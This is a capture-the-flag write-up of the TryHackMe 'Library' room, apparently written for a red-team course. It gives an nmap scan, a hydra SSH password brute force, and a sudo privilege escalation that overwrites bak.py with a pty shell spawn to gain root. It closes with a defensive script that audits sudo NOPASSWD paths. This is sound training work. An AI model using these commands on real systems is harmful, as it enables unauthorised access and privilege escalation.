This write-up covers the steps taken to solve a beginner-level security challenge: finding the user.txt and root.txt flags in the Library room on the TryHackMe platform.
This blog was written as part of a task for the Masters Certification in Red Team Program from HackerU.
Step 1 : Connect to TryHackMe and start target machine.
1. Download the OpenVPN configuration file from the TryHackMe platform.
2. Connect to TryHackMe by running this command in a Kali terminal:
sudo openvpn /pathtoOVPNfile.ovpn
3. Start the machine in the ‘library’ room. The target IP address will be displayed in a minute.
https://tryhackme.com/room/bsidesgtlibrary
Step 2 : Information gathering using Nmap
- Start an Nmap scan of the target IP:
nmap -A -O <target ip>
Step 3: Detailed Findings
Open ports:
22 : SSH
80 : HTTP (Apache httpd 2.4.18)
1. Navigating to robots.txt gave the hint “rockyou”.
2. Accessing open ports
Port 80 : the username is displayed as the author
3. Since port 22 is open, try to brute-force SSH and find the user's credentials, using the username found above and the clue from robots.txt:
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt 10.10.43.179 ssh
4. Log in over SSH with the credentials found above; the login is successful.
ssh meliodas@<targetip>
5. Found user.txt
6. Check for sudo privileges:
sudo -l
7. bak.py is permitted to run with sudo NOPASSWD, so remove bak.py and create a new file in its place:
rm bak.py
echo 'import pty;pty.spawn("/bin/sh")' > /home/meliodas/bak.py
8. Run the bak.py file with sudo; the user gets root access.
sudo python /home/meliodas/bak.py
9. Navigate to the root folder; the root.txt file is found there.
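The replacement in step 7 is possible because bak.py sits in a directory the logged-in user can write to, so the file can be deleted and recreated regardless of its own permissions. The following check is an added example, not part of the original write-up: it takes `sudo -l` output (the sample is constructed, and the function names are hypothetical) and flags every NOPASSWD path that has a component not owned by root or writable by group/world, assuming only uid 0 is trusted.

```python
import os
import re
import stat

# Constructed `sudo -l` output modelled on step 6; the host name is a placeholder.
SAMPLE_SUDO_L = """\
User meliodas may run the following commands on library:
    (ALL) NOPASSWD: /usr/bin/python /home/meliodas/bak.py
"""

def nopasswd_paths(sudo_l_text):
    """Return every absolute path named in a NOPASSWD rule."""
    paths = []
    for line in sudo_l_text.splitlines():
        match = re.search(r"NOPASSWD:\s*(.+)", line)
        if match:
            for cmd in match.group(1).split(","):
                paths += [tok for tok in cmd.split() if tok.startswith("/")]
    return paths

def weak_components(path, trusted_uids=(0,), stat_fn=os.stat):
    """Walk from path up to / and report components a non-root user controls."""
    findings = []
    current = os.path.normpath(path)
    while True:
        try:
            st = stat_fn(current)  # os.stat follows symlinks
        except OSError:
            findings.append((current, "missing"))
        else:
            if st.st_uid not in trusted_uids:
                findings.append((current, "owner uid %d" % st.st_uid))
            writable = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
            # A sticky directory stops users deleting files they do not own.
            sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
            if writable and not sticky_dir:
                findings.append((current, "group/world writable"))
        if current == "/":
            return findings
        current = os.path.dirname(current)

def audit(sudo_l_text, **kwargs):
    """Map each NOPASSWD path to its weak components; clean paths are omitted."""
    report = {}
    for path in nopasswd_paths(sudo_l_text):
        found = weak_components(path, **kwargs)
        if found:
            report[path] = found
    return report

if __name__ == "__main__":
    for path, found in audit(SAMPLE_SUDO_L).items():
        print(path, found)
```

A finding is cleared by moving the script to a root-owned directory such as /usr/local/sbin and pointing the sudoers rule at that path.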
With these steps, I was able to answer the questions posted in the Library room on TryHackMe.
Thank you for reading this blog.